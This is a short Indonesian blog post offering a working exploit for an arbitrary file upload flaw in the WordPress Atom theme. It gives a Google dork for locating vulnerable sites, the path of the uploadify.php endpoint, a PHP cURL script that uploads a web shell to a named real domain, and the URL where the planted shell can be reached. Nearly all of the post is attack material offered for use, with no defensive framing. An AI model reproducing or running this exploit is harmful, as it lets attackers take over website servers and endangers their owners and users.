WordPress Atom Themes Arbitrary File Upload

Leave a Comment
Assalamualaikum.

- Dork : inurl:"/wp-content/themes/atom/"
- Exploit : /wp-content/themes/atom/uploadify/uploadify.php
- Vulnerability : BLANK
 
 <?php

$uploadfile="eitaro.php";
$ch = curl_init("http://codeglee.com/wp-content/themes/atom/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>



Shell Akses : http://localhost/wp-content/themes/atom/uploadify/uploads/randomnameshell.php

Sekian dan Salam Ganteng


Source : Slemanroot 
Next PostPosting Lebih Baru Previous PostPosting Lama Beranda

0 komentar:

Posting Komentar

Diberdayakan oleh Blogger.